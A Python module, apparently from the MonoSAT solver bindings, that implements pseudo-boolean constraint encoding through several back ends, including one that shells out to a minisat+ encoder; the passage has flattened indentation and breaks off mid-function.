from monosat.logic import *
from monosat.manager import Manager
from monosat.monosat_c import Monosat, dimacs, Ineq
from tempfile import NamedTemporaryFile
debug = False
# Collects a set of graphs to encode together into a formula
class PBManager(metaclass=Manager):
def setPB(self, pb):
self.pb = pb
def __init__(self):
self.pb = MonosatPB() # MinisatPlus()
self.import_time = 0
self.elapsed_time = 0
def clear(self):
if self.pb:
self.pb.clear()
def AssertLessThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<", weights)
# self.constraints.append((clause,val,'<',weights))
def AssertGreaterThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">", weights)
# self.constraints.append((clause,val,'>',weights))
def AssertLessEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<=", weights)
# self.constraints.append((clause,val,'<=',weights))
def AssertGreaterEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">=", weights)
# self.constraints.append((clause,val,'>=',weights))
def AssertEqualPB(self, clause, val, weights=None):
# self.constraints.append((clause,val,'=',weights))
self.AssertPB(clause, val, "=", weights)
def AssertNotEqualPB(self, clause, val, weights=None):
# self.constraints.append((clause,val,'=',weights))
self.AssertPB(clause, val, "!=", weights)
def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
self.pb.AssertRangePB(clause, lowerBound, upperBound, weights)
def AssertPB(self, clause, val, constraint, weights=None):
self.pb.AssertPB(clause, val, constraint, weights)
def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
return self.pb.twoSidedRangePB(clause, lowerBound, upperBound, weights)
def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
return self.pb.twoSidedPB(clause, val, constraint, weights, condition)
def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
return self.pb.conditionalPB(clause, val, constraint, weights, condition)
def conditionalRangePB(
self, clause, lowerBound, upperBound, weights=None, condition=None
):
return self.pb.conditionalRangePB(
clause, lowerBound, upperBound, weights, condition
)
def LessThanPB(self, clause, val, weights=None, condition=None):
return self.conditionalPB(clause, val, "<", weights, condition)
def GreaterThanPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>',weights))
return self.conditionalPB(clause, val, ">", weights, condition)
def LessEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'<=',weights))
return self.conditionalPB(clause, val, "<=", weights, condition)
def GreaterEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>=',weights))
return self.conditionalPB(clause, val, ">=", weights, condition)
def EqualPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'=',weights))
return self.conditionalPB(clause, val, "=", weights, condition)
def AssertAtMostOne(self, clause):
new_clause = []
# create fresh variables, so that theory vars can be used as arguments here.
for l in clause:
l2 = Var()
new_clause.append(l2)
AssertEq(l2, l)
Monosat().AssertAtMostOne([l.getLit() for l in new_clause])
def AssertExactlyOne(self, clause):
AssertClause(clause)
self.AssertAtMostOne(clause)
def hasConstraints(self):
return self.pb.hasConstraints()
def write(self):
self.pb.write()
def flush(self):
self.pb.write()
self.pb.clear()
class MonosatPB:
def __init__(self):
self._monosat = monosat.monosat_c.Monosat()
def clear(self):
pass
def AssertLessThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<", weights)
# self.constraints.append((clause,val,'<',weights))
def AssertGreaterThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">", weights)
# self.constraints.append((clause,val,'>',weights))
def AssertLessEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<=", weights)
# self.constraints.append((clause,val,'<=',weights))
def AssertGreaterEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">=", weights)
# self.constraints.append((clause,val,'>=',weights))
def AssertEqualPB(self, clause, val, weights=None):
# self.constraints.append((clause,val,'=',weights))
self.AssertPB(clause, val, "=", weights)
def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
if lowerBound == upperBound:
self.AssertEqualPB(clause, lowerBound, weights)
else:
self.AssertGreaterEqPB(clause, lowerBound, weights)
self.AssertLessEqPB(clause, upperBound, weights)
# self.constraints.append((clause,lowerBound,'>=',weights))
# self.constraints.append((clause,upperBound,'<=',weights))
def getIneq(self, constraint):
if constraint == "<":
return Ineq.LT
elif constraint == "<=":
return Ineq.LEQ
elif constraint == "=" or constraint == "==":
return Ineq.EQ
elif constraint == ">=":
return Ineq.GEQ
elif constraint == ">":
return Ineq.GEQ
else:
raise Exception("Unknown operator " + str(constraint))
def AssertPB(self, clause, val, constraint, weights=None):
if constraint == "!=" or constraint == "<>":
self.AssertNotEqualPB(clause, val, weights)
return
nclause = [l.getLit() for l in clause]
nweights = weights
if nweights is None:
nweights = []
nweights = list(nweights)
while len(nweights) < len(nclause):
nweights.append(1)
# need all the variables to be in positive polarity...
"""
for i,l in enumerate(clause):
if weights is not None:
w = weights[i]
else:
w=1
if w==0:
continue
if l.isConstTrue():
val-=w
continue
elif l.isConstFalse():
continue
if Monosat().isPositive(l.getLit()):
nclause.append(l.getLit());
nweights.append(w)
else:
nclause.append(Not(l).getLit())
nweights.append(-w)
val-=w
"""
self._monosat.AssertPB(nclause, nweights, self.getIneq(constraint), val)
def _negate(self, constraint):
if constraint == "<":
return ">="
elif constraint == "<=":
return ">"
elif constraint == ">":
return "<="
elif constraint == ">=":
return "<"
elif constraint == "=":
raise Exception("Cannot negate equality")
# return '='; #!= is not directly supported in opb format, need to handle it separately
else:
raise Exception("Unknown operator " + constraint)
def AssertNotEqualPB(self, clause, value, weights=None):
Assert(Not(self.twoSidedPB(clause, value, "=", weights)))
def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
# Because opb doesn't support an inequality operator, we are instead going to make yet another choice, and then conditionally enforce that either > or < holds
if lowerBound == upperBound:
return self.twoSidedPB(clause, lowerBound, "=", weights)
elif lowerBound is None:
return self.twoSidedPB(clause, upperBound, "<=", weights)
elif upperBound is None:
return self.twoSidedPB(clause, lowerBound, ">=", weights)
condition = Var()
self.conditionalRangePB(clause, lowerBound, upperBound, weights, condition)
# If the condition that we are within (inclusive) the range of [lowerBound,upperBound] is false, then we must be outside that range
condition_g = (
Var()
) # If variable condition_g is true, AND variable condition is false, then enforce the > condition.
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
AssertImplies(And(Not(condition), condition_g), Equal(c, v))
self.AssertPB(conditional_clause, upperBound, ">", weights)
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
AssertImplies(And(Not(condition), Not(condition_g)), Equal(c, v))
self.AssertPB(conditional_clause, lowerBound, "<", weights)
return condition
def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
if constraint == "!=" or constraint == "<>":
return Not(self.twoSidedPB(clause, val, "=", weights, condition))
if condition is None:
condition = Var()
# elif not condition.isInput:
# v=Var()
# Assert(v==condition)
# condition=v
nclause = []
for v in clause:
# if(not v.isInput()):
# v2 = Var()
# AssertEq(v2,v)
# nclause.append(v2)
# else:
nclause.append(v)
if weights is None:
weights = []
while len(weights) < len(clause):
weights.append(1)
if constraint != "=":
# a two sided constraint is just two one-sided conditional constraints
self.conditionalPB(nclause, val, constraint, weights, condition)
self.conditionalPB(
nclause, val, self._negate(constraint), weights, Not(condition)
)
else:
# Is there a more efficient way to build a two sided equality constraint out of onesided constraints?
self.conditionalPB(nclause, val, ">=", weights, condition)
self.conditionalPB(nclause, val, "<=", weights, condition)
self.conditionalPB(nclause, val, ">", weights, Not(condition))
self.conditionalPB(nclause, val, "<", weights, Not(condition))
return condition
def conditionalPB_old(self, clause, val, constraint, weights=None, condition=None):
if condition is None:
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition, Equal(c, v)))
self.AssertPB(conditional_clause, val, constraint, weights)
return condition
def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
if constraint == "!=" or constraint == "<>":
v = Or(
self.conditionalPB(clause, val, "<", weights),
self.conditionalPB(clause, val, ">", weights),
)
if condition is not None:
AssertEq(v, condition)
return v
if condition is None:
condition = Var()
else:
v = Var()
AssertEq(v, Not(condition))
condition = v
if weights is None:
weights = []
while len(weights) < len(clause):
weights.append(1)
nclause = []
for v in clause:
# For now, it is a limitation of the pb constraint solver that all variables it deals with must be input variables in the circuit.
# So, we create them here if needed
# if(not v.isInput()):
# v2 = Var()
# AssertEq(v2,v)
# nclause.append(v2)
# else:
nclause.append(v)
if (
constraint == ">"
or constraint == ">="
or constraint == "="
or constraint == "=="
):
negWeightSum = 0
for w in weights:
if w < 0:
negWeightSum += abs(w)
total = negWeightSum + val
if constraint == ">":
total += 1
nclause.append(condition)
weights.append(total)
if constraint == ">" or constraint == ">=":
self.AssertPB(nclause, val, constraint, weights)
else:
self.AssertPB(nclause, val, ">=", weights)
nclause.pop()
weights.pop()
if (
constraint == "<"
or constraint == "<="
or constraint == "="
or constraint == "=="
):
posWeightSum = 0
for w in weights:
if w > 0:
posWeightSum += abs(w)
total = posWeightSum + val
if constraint == "<":
total += 1
nclause.append(condition)
weights.append(-total)
if constraint == "<" or constraint == "<=":
self.AssertPB(nclause, val, constraint, weights)
else:
self.AssertPB(nclause, val, "<=", weights)
nclause.pop()
weights.pop()
return Not(
condition
) # The property is enforced if the condition variable is false
def conditionalRangePB(
self, clause, lowerBound, upperBound, weights=None, condition=None
):
if lowerBound == upperBound:
return self.EqualPB(clause, lowerBound, weights, condition)
elif lowerBound is None:
return self.conditionalPB(clause, upperBound, "<=", weights, condition)
elif upperBound is None:
return self.conditionalPB(clause, lowerBound, ">=", weights, condition)
if condition is None:
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
AssertImplies(condition, Equal(c, v))
self.AssertPB(conditional_clause, lowerBound, ">=", weights)
self.AssertPB(conditional_clause, upperBound, "<=", weights)
return condition
def LessThanPB(self, clause, val, weights=None, condition=None):
return self.conditionalPB(clause, val, "<", weights, condition)
def GreaterThanPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>',weights))
return self.conditionalPB(clause, val, ">", weights, condition)
def LessEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'<=',weights))
return self.conditionalPB(clause, val, "<=", weights, condition)
def GreaterEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>=',weights))
return self.conditionalPB(clause, val, ">=", weights, condition)
def EqualPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'=',weights))
return self.conditionalPB(clause, val, "=", weights, condition)
def hasConstraints(self):
return False
# not required, will be called automatically inside monosat
def write(self):
self._monosat.flushPB()
class MonosatTheoryPB:
def __init__(self):
self.constraints = []
def clear(self):
self.constraints = []
def hasConstraints(self):
return len(self.constraints) > 0
def AssertLessThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<", weights)
def AssertGreaterThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">", weights)
def AssertLessEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<=", weights)
def AssertGreaterEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">=", weights)
def AssertEqualPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "=", weights)
def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
if lowerBound == upperBound:
self.AssertEqualPB(clause, lowerBound, weights)
else:
self.AssertGreaterEqPB(clause, lowerBound, weights)
self.AssertLessEqPB(clause, upperBound, weights)
def AssertPB(self, clause, val, constraint, weights=None):
nclause = list(clause)
self.constraints.append(
(
nclause,
val,
constraint,
list(weights) if weights is not None else [],
None,
False,
)
)
def twoSidedRangePB(
self, clause, lowerBound, upperBound, weights=None, condition=None
):
if condition is None:
condition = Var()
# elif not condition.isInput:
# v=Var()
# Assert(v==condition)
# condition=v
if lowerBound == upperBound:
return self.twoSided(clause, lowerBound, "=", weights, condition)
c1 = self.twoSidedPB(clause, lowerBound, ">=", weights)
c2 = self.twoSidedPB(clause, upperBound, "<=", weights)
if condition is None:
condition = And(c1, c2)
else:
AssertEq(condition, And(c1, c2))
return condition
def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
if condition is None:
condition = Var()
# elif not condition.isInput:
# v=Var()
# Assert(v==condition)
# condition=v
nclause = []
for v in clause:
# if(not v.isInput()):
# v2 = Var()
# Assert(Equal(v2,v))
# nclause.append(v2)
# else:
nclause.append(v)
self.constraints.append(
(
nclause,
val,
constraint,
list(weights) if weights is not None else [],
condition,
False,
)
)
return condition
def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
if condition is None:
condition = Var()
# elif not condition.isInput:
# v=Var()
# Assert(v==condition)
# condition=v
nclause = []
for v in clause:
# if(not v.isInput()):
# v2 = Var()
# Assert(Equal(v2,v))
# nclause.append(v2)
# else:
nclause.append(v)
self.constraints.append(
(
nclause,
val,
constraint,
list(weights) if weights is not None else [],
condition,
True,
)
)
return condition
def conditionalRangePB(
self, clause, lowerBound, upperBound, weights=None, condition=None
):
if lowerBound == upperBound:
return self.conditionalPB(clause, lowerBound, "=", weights, condition)
c1 = self.twoSidedPB(clause, lowerBound, ">=", weights)
c2 = self.twoSidedPB(clause, upperBound, "<=", weights)
if condition is None:
condition = And(c1, c2)
else:
Assert(Equal(condition, And(c1, c2)))
return condition
def LessThanPB(self, clause, val, weights=None, condition=None):
return self.conditionalPB(clause, val, "<", weights, condition)
def GreaterThanPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>',weights))
return self.conditionalPB(clause, val, ">", weights, condition)
def LessEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'<=',weights))
return self.conditionalPB(clause, val, "<=", weights, condition)
def GreaterEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>=',weights))
return self.conditionalPB(clause, val, ">=", weights, condition)
def EqualPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'=',weights))
return self.conditionalPB(clause, val, "=", weights, condition)
def write(self, filename):
f = open(filename, "a")
for (
clause,
val,
constraint,
weights,
conditionVar,
oneSided,
) in self.constraints:
assert len(clause) == len(weights) or len(weights) == 0
assert len(clause) > 0
f.write("pb_lt " + str(len(clause)) + " ")
for v in clause:
f.write(str(v.getInputLiteral()) + " ")
f.write(str(len(weights)) + " ")
for w in weights:
f.write(str(w) + " ")
f.write(constraint + " " + str(val) + " ")
if conditionVar is None:
f.write("0")
else:
if oneSided:
f.write("1 ")
else:
f.write("2 ")
f.write(str(conditionVar.getInputLiteral()))
f.write("\n")
pass
class MinisatPlus:
def __init__(self):
self.constraints = []
def clear(self):
self.constraints = []
def AssertLessThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<", weights)
# self.constraints.append((clause,val,'<',weights))
def AssertGreaterThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">", weights)
# self.constraints.append((clause,val,'>',weights))
def AssertLessEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<=", weights)
# self.constraints.append((clause,val,'<=',weights))
def AssertGreaterEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">=", weights)
# self.constraints.append((clause,val,'>=',weights))
def AssertEqualPB(self, clause, val, weights=None):
# self.constraints.append((clause,val,'=',weights))
self.AssertPB(clause, val, "=", weights)
def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
if lowerBound == upperBound:
self.AssertEqualPB(clause, lowerBound, weights)
else:
self.AssertGreaterEqPB(clause, lowerBound, weights)
self.AssertLessEqPB(clause, upperBound, weights)
# self.constraints.append((clause,lowerBound,'>=',weights))
# self.constraints.append((clause,upperBound,'<=',weights))
def AssertPB(self, clause, val, constraint, weights=None):
if constraint == "!=" or constraint == "<>":
self.AssertNotEqualPB(clause, val, weights)
return
nclause = []
nweights = []
# need all the variables to be in positive polarity...
for i, l in enumerate(clause):
if weights is not None:
w = weights[i]
else:
w = 1
if w == 0:
continue
if l.isConstTrue():
val -= w
continue
elif l.isConstFalse():
continue
if Monosat().isPositive(l.getLit()):
nclause.append(l)
nweights.append(w)
else:
nclause.append(Not(l))
nweights.append(-w)
val -= w
self.constraints.append((nclause, val, constraint, nweights))
def _negate(self, constraint):
if constraint == "<":
return ">="
elif constraint == "<=":
return ">"
elif constraint == ">":
return "<="
elif constraint == ">=":
return "<"
elif constraint == "=":
raise Exception("Cannot negate equality")
# return '='; #!= is not directly supported in opb format, need to handle it separately
else:
raise Exception("Unknown operator " + constraint)
def AssertNotEqualPB(self, clause, value, weights=None):
Assert(Not(self.twoSidedPB(clause, value, "=", weights)))
def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
# Because opb doesn't support an inequality operator, we are instead going to make yet another choice, and then conditionally enforce that either > or < holds
if lowerBound == upperBound:
return self.twoSidedPB(clause, lowerBound, "=", weights)
elif lowerBound is None:
return self.twoSidedPB(clause, upperBound, "<=", weights)
elif upperBound is None:
return self.twoSidedPB(clause, lowerBound, ">=", weights)
condition = Var()
self.conditionalRangePB(clause, lowerBound, upperBound, weights, condition)
# If the condition that we are within (inclusive) the range of [lowerBound,upperBound] is false, then we must be outside that range
condition_g = (
Var()
) # If variable condition_g is true, AND variable condition is false, then enforce the > condition.
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
AssertImplies(And(Not(condition), condition_g), Equal(c, v))
self.AssertPB(conditional_clause, upperBound, ">", weights)
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
AssertImplies(And(Not(condition), Not(condition_g)), Equal(c, v))
self.AssertPB(conditional_clause, lowerBound, "<", weights)
return condition
def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
if constraint == "!=" or constraint == "<>":
return Not(self.twoSidedPB(clause, val, "=", weights, condition))
if condition is None:
condition = Var()
# elif not condition.isInput:
# v=Var()
# Assert(v==condition)
# condition=v
nclause = []
for v in clause:
# if(not v.isInput()):
# v2 = Var()
# AssertEq(v2,v)
# nclause.append(v2)
# else:
nclause.append(v)
if weights is None:
weights = []
while len(weights) < len(clause):
weights.append(1)
"""
conditional_clause=[]
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition,Equal(c,v)))
self.AssertPB(conditional_clause,val,constraint,weights)
if(constraint != '='):
conditional_clause=[]
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(Not(condition),Equal(c,v)))
self.AssertPB(conditional_clause,val,self._negate(constraint),weights)
#This doesn't work. If constraint is (1 a 1 b <= 2), then the second side becomes
#1 c 1 d > 2, which is not UNSAT.
else:
#Because opb doesn't support an inequality operator, we are instead going to make yet another choice, and then conditionally enforce that either > or < holds
condition_g = Var() #If variable condition_g is true, AND variable condition is false, then enforce the > condition.
conditional_clause=[]
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(And(Not(condition),condition_g),Equal(c,v)))
self.AssertPB(conditional_clause,val,'>',weights)
conditional_clause=[]
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(And(Not(condition),Not(condition_g)),Equal(c,v)))
self.AssertPB(conditional_clause,val,'<',weights)
"""
if constraint != "=":
# a two sided constraint is just two one-sided conditional constraints
self.conditionalPB(nclause, val, constraint, weights, condition)
self.conditionalPB(
nclause, val, self._negate(constraint), weights, Not(condition)
)
else:
# Is there a more efficient way to build a two sided equality constraint out of onesided constraints?
self.conditionalPB(nclause, val, ">=", weights, condition)
self.conditionalPB(nclause, val, "<=", weights, condition)
self.conditionalPB(nclause, val, ">", weights, Not(condition))
self.conditionalPB(nclause, val, "<", weights, Not(condition))
return condition
def conditionalPB_old(self, clause, val, constraint, weights=None, condition=None):
if condition is None:
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition, Equal(c, v)))
self.AssertPB(conditional_clause, val, constraint, weights)
return condition
def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
if constraint == "!=" or constraint == "<>":
v = Or(
self.conditionalPB(clause, val, "<", weights),
self.conditionalPB(clause, val, ">", weights),
)
if condition is not None:
AssertEq(v, condition)
return v
if condition is None:
condition = Var()
else:
v = Var()
AssertEq(v, Not(condition))
condition = v
"""
conditional_clause=[]
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition,Equal(c,v)))
self.AssertPB(conditional_clause,val,constraint,weights)
"""
if weights is None:
weights = []
while len(weights) < len(clause):
weights.append(1)
nclause = []
for v in clause:
# For now, it is a limitation of the pb constraint solver that all variables it deals with must be input variables in the circuit.
# So, we create them here if needed
# if(not v.isInput()):
# v2 = Var()
# AssertEq(v2,v)
# nclause.append(v2)
# else:
nclause.append(v)
if (
constraint == ">"
or constraint == ">="
or constraint == "="
or constraint == "=="
):
negWeightSum = 0
for w in weights:
if w < 0:
negWeightSum += abs(w)
total = negWeightSum + val
if constraint == ">":
total += 1
nclause.append(condition)
weights.append(total)
if constraint == ">" or constraint == ">=":
self.AssertPB(nclause, val, constraint, weights)
else:
self.AssertPB(nclause, val, ">=", weights)
nclause.pop()
weights.pop()
if (
constraint == "<"
or constraint == "<="
or constraint == "="
or constraint == "=="
):
posWeightSum = 0
for w in weights:
if w > 0:
posWeightSum += abs(w)
total = posWeightSum + val
if constraint == "<":
total += 1
nclause.append(condition)
weights.append(-total)
if constraint == "<" or constraint == "<=":
self.AssertPB(nclause, val, constraint, weights)
else:
self.AssertPB(nclause, val, "<=", weights)
nclause.pop()
weights.pop()
return Not(
condition
) # The property is enforced if the condition variable is false
def conditionalRangePB(
self, clause, lowerBound, upperBound, weights=None, condition=None
):
if lowerBound == upperBound:
return self.EqualPB(clause, lowerBound, weights, condition)
elif lowerBound is None:
return self.conditionalPB(clause, upperBound, "<=", weights, condition)
elif upperBound is None:
return self.conditionalPB(clause, lowerBound, ">=", weights, condition)
if condition is None:
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
AssertImplies(condition, Equal(c, v))
self.AssertPB(conditional_clause, lowerBound, ">=", weights)
self.AssertPB(conditional_clause, upperBound, "<=", weights)
return condition
def LessThanPB(self, clause, val, weights=None, condition=None):
return self.conditionalPB(clause, val, "<", weights, condition)
def GreaterThanPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>',weights))
return self.conditionalPB(clause, val, ">", weights, condition)
def LessEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'<=',weights))
return self.conditionalPB(clause, val, "<=", weights, condition)
def GreaterEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>=',weights))
return self.conditionalPB(clause, val, ">=", weights, condition)
def EqualPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'=',weights))
return self.conditionalPB(clause, val, "=", weights, condition)
def hasConstraints(self):
return len(self.constraints) > 0
def write(self):
if len(self.constraints) == 0:
return
tmpfile = NamedTemporaryFile(delete=False, suffix=".opb")
tmpopb = tmpfile.name
tmpfile.close()
tmpfile = NamedTemporaryFile(delete=False, suffix=".cnf")
tmpcnf = tmpfile.name
tmpfile.close()
longest_constraint = 0
try:
minisat_plus_path = shutil.which("monosatpb")
except:
minisat_plus_path = which("monosatpb")
if minisat_plus_path is None:
raise RuntimeError(
"In order to use PB constraints, monosatpb must be installed and on the path (see README).\n"
)
print(
"Encoding pb constraints using %s using temporary files %s and %s "
% (minisat_plus_path, tmpopb, tmpcnf)
)
fopb = open(tmpopb, "w")
invarmap = dict()
outvarmap = dict()
varmap = dict()
nvars = 0
for (clause, val, op, weights) in self.constraints:
if not isinstance(val, int):
raise TypeError(
"PB constraints weights must compare to integers, but found "
+ str(type(val))
)
if len(clause) == 0:
clause = [false()]
if len(clause) > longest_constraint:
longest_constraint = len(clause)
for v in clause:
l = dimacs(v.getLit())
if l not in invarmap:
nvars += 1
invarmap[l] = nvars
varmap[nvars] = v.getLit()
n_pbs = 0
nvars += 1
fopb.write(
"* #variable= "
+ str(nvars)
+ " #constraint= "
+ str(len(self.constraints))
+ "\n"
)
for (clause, val, op, weights) in self.constraints:
if weights is None:
weights = []
if len(weights) > 0:
pass
if len(clause) == 0:
clause = [false()]
n_pbs += 1
while len(weights) < len(clause):
weights.append(1) # Default weight
for (v, w) in zip(clause, weights):
l = dimacs(v.getLit())
fopb.write(
("+" if w >= 0 else "") + str(w) + " x" + str(invarmap[l]) + " "
)
fopb.write(op + " " + str(val) + " ;\n")
fopb.close()
os.system(
"ulimit -s %d" % (32768 + longest_constraint)
) # need to give minisat+ more stack space, or it will crash when trying to create BDDs...
opts = ""
if longest_constraint >= 5000:
opts = (
"-ca"
) # Switch to simple adder encoding if there are very large pb constraints, or else minisat+ will be inordinately slow
print(
"Note: using minisat+ %s encoding because largest pb constraint has %d > 5000 arguments"
% (opts, longest_constraint)
)
# This call is designed for the original Minisat+; it can easily be adapted for other pb constraint->cnf encoders.
status = os.system(
"%s %s -a -s -v0 -cnf=" % (minisat_plus_path, opts) + tmpcnf + " " + tmpopb
) # a turns off ansi-codes in output, -s turns off sat competition output, and -v0 sets verbosity to 0.
if status != 0:
raise RuntimeError(
"In order to use PB constraints, minisat+ (1.0) must be installed and on the path.\nEither it wasn't found, or it was but still returned an exit code of %d\n"
% (status)
)
print("Importing %d pseudoboolean constraints into Monosat..." % (n_pbs))
t = time.clock()
Monosat().comment("pseudoboolean constraints")
n_cls = 0
convcnf = open(tmpcnf, "r")
for line in convcnf.readlines():
if line.startswith("p cnf"): # Header
header = line.split()
# vars = int(header[2])
elif line.startswith("c"):
pass
elif len(line.split()) == 0:
pass
else:
n_cls += 1
clause = list(map(int, line.split()))
newclause = []
assert len(clause) > 1
assert clause[-1] == 0
for i in range(len(clause)):
l = clause[i]
if l == 0:
continue
v = abs(l)
if v not in varmap:
varmap[v] = Monosat().newLit()
newl = varmap[v]
if l < 0:
newl = Monosat().Not(newl)
newclause.append(newl)
# fcnf.write(str(v) + " ")
# fcnf.write("0\n")
Monosat().addClause(newclause)
Monosat().comment("end of pseudoboolean constraints")
os.remove(tmpopb)
os.remove(tmpcnf)
PBManager().import_time += time.clock() - t
print("Imported pseudoboolean constraints into Monosat (%d clauses)" % (n_cls))
class PBSugar:
def __init__(self):
self.constraints = []
def clear(self):
self.constraints = []
def hasConstraints(self):
return len(self.constraints) > 0
def AssertLessThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<", weights)
# self.constraints.append((clause,val,'<',weights))
def AssertGreaterThanPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">", weights)
# self.constraints.append((clause,val,'>',weights))
def AssertLessEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, "<=", weights)
# self.constraints.append((clause,val,'<=',weights))
def AssertGreaterEqPB(self, clause, val, weights=None):
self.AssertPB(clause, val, ">=", weights)
# self.constraints.append((clause,val,'>=',weights))
def AssertEqualPB(self, clause, val, weights=None):
# self.constraints.append((clause,val,'=',weights))
self.AssertPB(clause, val, "=", weights)
def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
if lowerBound == upperBound:
self.AssertEqualPB(clause, lowerBound, weights)
else:
self.AssertGreaterEqPB(clause, lowerBound, weights)
self.AssertLessEqPB(clause, upperBound, weights)
# self.constraints.append((clause,lowerBound,'>=',weights))
# self.constraints.append((clause,upperBound,'<=',weights))
def AssertPB(self, clause, val, constraint, weights=None):
nclause = list(clause)
self.constraints.append(
(nclause, val, constraint, list(weights) if weights is not None else [])
)
def _negate(self, constraint):
if constraint == "<":
return ">="
elif constraint == "<=":
return ">"
elif constraint == ">":
return "<="
elif constraint == ">=":
return "<"
elif constraint == "=":
raise Exception("Cannot negate equality")
# return '='; #!= is not directly supported in opb format, need to handle it separately
else:
raise Exception("Unknown operator " + constraint)
def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
# Because opb doesn't support an inequality operator, we are instead going to make yet another choice, and then conditionally enforce that either > or < holds
if lowerBound == upperBound:
return self.twoSidedPB(clause, lowerBound, "=", weights)
elif lowerBound is None:
return self.twoSidedPB(clause, upperBound, "<=", weights)
elif upperBound is None:
return self.twoSidedPB(clause, lowerBound, ">=", weights)
condition = Var()
self.conditionalRangePB(clause, lowerBound, upperBound, weights, condition)
# If the condition that we are within (inclusive) the range of [lowerBound,upperBound] is false, then we must be outside that range
condition_g = (
Var()
) # If variable condition_g is true, AND variable condition is false, then enforce the > condition.
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(And(Not(condition), condition_g), Equal(c, v)))
self.AssertPB(conditional_clause, upperBound, ">", weights)
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(And(Not(condition), Not(condition_g)), Equal(c, v)))
self.AssertPB(conditional_clause, lowerBound, "<", weights)
return condition
def twoSidedPB(self, clause, val, constraint, weights=None):
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition, Equal(c, v)))
self.AssertPB(conditional_clause, val, constraint, weights)
if constraint != "=":
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(Not(condition), Equal(c, v)))
self.AssertPB(conditional_clause, val, self._negate(constraint), weights)
else:
# Because opb doesn't support an inequality operator, we are instead going to make yet another choice, and then conditionally enforce that either > or < holds
condition_g = (
Var()
) # If variable condition_g is true, AND variable condition is false, then enforce the > condition.
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(And(Not(condition), condition_g), Equal(c, v)))
self.AssertPB(conditional_clause, val, ">", weights)
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(And(Not(condition), Not(condition_g)), Equal(c, v)))
